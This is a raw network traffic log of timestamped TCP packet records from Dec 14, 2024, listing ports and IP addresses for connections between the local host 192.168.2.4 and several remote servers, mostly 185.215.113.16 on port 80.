Dec 14, 2024 12:56:25.737237930 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.737302065 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.737562895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.737658978 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.738008022 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.738493919 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.738529921 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.739350080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.739383936 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.739425898 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.739525080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.740135908 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.740171909 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.740216017 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.740643024 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.741014957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.741050959 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.741223097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.741750956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.741906881 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.741986036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.742826939 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.742986917 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.743639946 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.743678093 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.744383097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.744417906 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.745194912 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.745321035 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.746073008 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.746110916 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.746117115 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.746159077 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.746217012 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.746817112 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.746927023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.746987104 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.747225046 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.747615099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.763323069 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.763354063 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.763371944 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.767862082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.769227982 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:25.769244909 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.769556046 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:25.896326065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.896375895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.896411896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.896449089 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.896486998 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.897460938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.897514105 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.898044109 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.898291111 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.898838043 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.898873091 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.899663925 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.899832010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.900474072 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.900585890 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.901514053 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.901618958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.902189970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.902292967 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.903158903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.903295040 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.904033899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.904177904 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.904969931 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.905049086 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.905733109 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.905870914 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.906440973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.906546116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.907236099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.907387972 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.908116102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.908210039 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.908803940 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.908962965 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.909080029 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.909719944 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.909929991 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.910584927 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.910702944 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.911427021 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.911582947 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.912585974 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.912749052 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.913521051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.913680077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.914397955 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.914568901 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.914944887 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.915018082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.915018082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.915304899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.915415049 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.916336060 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.916498899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.917081118 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.917253971 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.917931080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.918073893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.918343067 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.918432951 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.918548107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.918662071 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.919225931 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.919409990 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.919874907 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.920001030 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.920701981 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.920825958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.921538115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.921688080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.922497034 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.922533989 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.923290014 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.923460007 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.924069881 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.924206018 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.924915075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.924967051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.925755978 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.925937891 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.926623106 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.926728010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.927474022 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.927649975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.928308010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.928417921 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.928997040 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.929128885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.929230928 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.929965019 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.930139065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.930788994 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.930941105 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.931646109 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.931771994 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.932514906 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.932648897 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.933324099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.933465004 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.934195995 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.934390068 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.935009956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.935110092 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.935915947 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.936029911 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.936696053 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.936815023 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.937551975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.937659025 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.938365936 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.938608885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.939295053 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.939394951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.940679073 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.940745115 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.947381020 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.949259996 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.960249901 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.960249901 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.960290909 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.960299015 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.960299015 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:25.971961975 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.972021103 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.972071886 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.981046915 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:25.982031107 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:25.998895884 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:25.998895884 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:25.998950005 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.998965979 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:26.088488102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.088560104 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.088597059 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.088635921 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.089472055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.089533091 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.090291023 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.090352058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.090390921 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.090943098 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.091042042 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.091804028 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.091878891 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.092698097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.092854023 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.093499899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.093647003 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.094321966 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.094481945 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.095182896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.095340014 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.095979929 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.096101046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.096856117 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.096972942 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.097932100 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.098036051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.098804951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.098965883 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.099513054 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.099565983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.099617004 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.099980116 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.099980116 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.100193977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.100294113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.101053953 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.101145983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.101897001 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.102145910 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.102741003 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.102824926 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.103636026 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.103745937 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.104661942 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.104753017 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.105488062 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.105524063 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.106110096 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.106194973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.106518030 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.106961012 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.107083082 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.107794046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.107903004 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.108674049 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.108808994 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.109467030 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.109589100 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.110366106 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.110487938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.110532999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.111166954 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.111373901 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.112104893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.112183094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.112848997 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.112966061 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.113724947 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.113806009 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:26.123363018 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.123411894 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:26.290210009 CET	49816	443	192.168.2.4	35.190.72.216
Dec 14, 2024 12:56:26.290294886 CET	443	49816	35.190.72.216	192.168.2.4
Dec 14, 2024 12:56:26.292243004 CET	49816	443	192.168.2.4	35.190.72.216
Dec 14, 2024 12:56:26.297213078 CET	49816	443	192.168.2.4	35.190.72.216
Dec 14, 2024 12:56:26.297297001 CET	443	49816	35.190.72.216	192.168.2.4
Dec 14, 2024 12:56:27.524693012 CET	443	49816	35.190.72.216	192.168.2.4
Dec 14, 2024 12:56:27.528177023 CET	49816	443	192.168.2.4	35.190.72.216
Dec 14, 2024 12:56:27.555665970 CET	49816	443	192.168.2.4	35.190.72.216
Dec 14, 2024 12:56:27.555742025 CET	443	49816	35.190.72.216	192.168.2.4
Dec 14, 2024 12:56:27.555778980 CET	49816	443	192.168.2.4	35.190.72.216
Dec 14, 2024 12:56:27.556255102 CET	443	49816	35.190.72.216	192.168.2.4
Dec 14, 2024 12:56:27.557034016 CET	49816	443	192.168.2.4	35.190.72.216
Dec 14, 2024 12:56:28.565085888 CET	49794	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:28.565316916 CET	49823	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:28.685225964 CET	80	49823	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:28.685427904 CET	80	49794	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:28.689877033 CET	49794	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:28.689898968 CET	49823	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:28.692976952 CET	49823	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:28.812913895 CET	80	49823	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:30.042119026 CET	80	49823	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:30.046266079 CET	49823	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:30.049225092 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:30.049922943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:30.170120001 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:30.170166969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:30.174772978 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:30.174932003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:30.190109015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:30.309941053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.487201929 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:31.517569065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517620087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517642975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.517662048 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517698050 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517735004 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517769098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517823935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517858982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517894983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.517934084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.518279076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.607599974 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:31.607691050 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:31.607851982 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:31.637933969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.637955904 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.645088911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.708863974 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.708937883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.708950996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.709000111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.713078976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.713138103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.713181019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.713287115 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.721581936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.721697092 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.721731901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.721790075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.727869034 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:31.730082989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.730129957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.730151892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.730202913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.738688946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.738784075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.738924980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.747183084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.747361898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.747395992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.747524977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.755669117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.755729914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.755832911 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.755878925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.764369965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.764658928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.768599987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.772857904 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.772896051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.775644064 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.781219006 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.781284094 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.781316042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.781364918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:31.789830923 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.790008068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:31.790743113 CET	49827	80	192.168.2.4	185.215.113.16
